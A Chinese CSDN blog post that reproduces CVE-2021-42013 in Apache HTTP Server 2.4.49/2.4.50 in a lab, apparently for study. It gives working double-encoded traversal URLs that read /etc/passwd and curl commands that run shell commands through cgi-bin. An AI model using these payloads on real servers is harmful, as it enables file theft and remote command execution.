Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)

最新推荐文章于 2024-07-08 17:07:16 发布
最新推荐文章于 2024-07-08 17:07:16 发布
阅读量377 收藏 1
点赞数 1
分类专栏: apache漏洞 文章标签: apache http 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53639243/article/details/136316519
版权
这篇文章报道了ApacheHTTPServer2.4.49和2.4.50版本中的一个漏洞,CVE-2021-42013源于CVE-2021-41773的修复不完全,攻击者可利用路径遍历攻击访问系统文件。漏洞在启用modscgi或cgid时可能导致任意命令执行。
摘要由CSDN通过智能技术生成

Apache HTTP 服务器项目旨在为现代操作系统(包括 UNIX 和 Windows)开发和维护开源 HTTP 服务器。

CVE-2021-42013 是由 CVE-2021-41773 修复不完整导致的漏洞,攻击者可以使用路径遍历攻击将 URL 映射到类别名指令配置的目录之外的文件。

此漏洞影响 Apache HTTP Server 2.4.49 和 2.4.50 以及更早版本。

复现:
默认页面:http://192.168.92.130:8080

Apache HTTP Server 2.4.50 修补了之前的 CVE-2021-41773 有效负载,但它不完整。

http://your:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

用于绕过修补程序(请注意,必须是现有目录):.%%32%65/icons/

/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
http://192.168.92.130:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

 存在目录遍历漏洞 

 

在服务器上启用 mods cgi 或 cgid 后 此目录遍历漏洞将允许任意命令执行:

curl -v --data "echo;id" 'http://192.168.92.130:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

  

curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; whoami' "http://192.168.92.130:8080//cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"

青梅fox
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache目录遍历漏洞
willow_liang的博客
10-21 2090
实验环境: win2003+phpstudy2014 1.目录遍历目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一-种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。程序在实现.上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。 1 漏洞复现 漏洞原理: 2 漏洞修复: ` Options -Index
Apache HTTP Server 2.4.50 路径遍历文件泄露漏洞 (CVE-2021-42013)实验报告
weixin_48400575的博客
02-19 4219
Apache HTTP Server 2.4.50 路径遍历文件泄露漏洞 (CVE-2021-42013)复现实验报告
目录遍历漏洞原理、解决方案
qq_44005305的博客
03-10 5766
目录遍历路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。
Apache 修复 Apache HTTP Server 的源代码泄露漏洞
最新发布
smellycat000的专栏
07-08 224
聚焦源代码安全,网罗国内外最新资讯!作者:Pierluigi Paganini编译:代码卫士Apache 软件基金会修复了Apache HTTP Server 的多个漏洞,其包括拒绝服务 (DoS)、远程代码执行和越权访问等问题。其一个漏洞是严重的源代码披露漏洞,编号为CVE-2024-39884。安全公告提到,“Apache HTTP Server 2.4.60内核的回归忽视了句柄的基...
Apache文件下载和目录遍历漏洞
weixin_51339377的博客
04-08 1237
文件下载漏洞+目录遍历漏洞 不安全的文件下载概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件路径而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。 此时如果 攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如../../../e
浅谈“目录浏览漏洞目录遍历漏洞
热门推荐
→_→
05-25 1万+
一:漏洞名称: 目录浏览漏洞 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。 风险:攻击者通过访问网站某一目录时,该目录没有默认首页文件或没有正确设置默认首页文件,将会把整个目录结构列出来,将网站结构完全暴露给攻击者; 攻击者可能通过浏览目录结构,访问到某些隐秘文件(如PHPINFO文件、服务器探针文件、网站管理员后台
Apache HTTPD 漏洞复现
来日可期的博客
09-07 2371
Apache HTTPD 多后缀解析漏洞Apache HTTPD 换行解析漏洞-CVE-2017-15715,Apache HTTP Server_2.4.49 路径遍历文件泄露漏洞-CVE-2021-41773,Apache HTTP 服务器 2.4.50 路径遍历文件泄露漏洞-CVE-2021-42013漏洞复现合集
目录浏览 网站目录可列 漏洞原理以及修复方法
it知识分享 free for nothing..
02-28 1558
目录浏览 网站目录可列 漏洞原理以及修复方法
Apache HTTP Server 2.4.49 路径遍历文件泄露漏洞 (CVE-2021-41773)复现实验报告
weixin_48400575的博客
02-13 3943
Apache HTTP Server 2.4.49 路径遍历文件泄露漏洞 (CVE-2021-41773)复现实验报告
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在内存...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统。然而,OpenSSH 也存在一些安全漏洞,其之一就是资源管理错误漏洞(CVE-2021-...
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3181
ApacheHTTPServerApache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
Apache HTTP Server 路径穿越漏洞
qq_53008544的博客
05-01 1403
发现对 Apache HTTP 服务器 2.4.50 CVE-2021-41773 的修复不足。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可能允许远程执行代码。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不会影响早期版本。
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
weixin_64655821的博客
10-13 2001
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
Apache漏洞合集
2301_77315080的博客
10-19 317
shtml跟html类似,也是一种用于网页设计的标记型语言,区别在于:html是一种纯静态的标记型语言,在html文档里面写的内容是什么,用户打开浏览器看到的就是什么,而shtml是一种半静态半动态的标记型语言,在shtml里面可以包含SSI命令,当用户在浏览器浏览shtml文档的时候,里面包含的SSI命令会被解析,然后再呈现内容给用户。3.后缀名为.jpg,因为文件名inf.php.jpg包含.php,所以解析为php文件,点的HEX值为2e,2e换成0a发送,0a是换行。4.访问页面解析成功。
CVE-2021-42013-Apache HTTP Server 2.4.50路径穿越流量特征
12306小哥
10-10 1371
0x1 简介 Apache HTTP ServerApache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本2.4.49版本出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值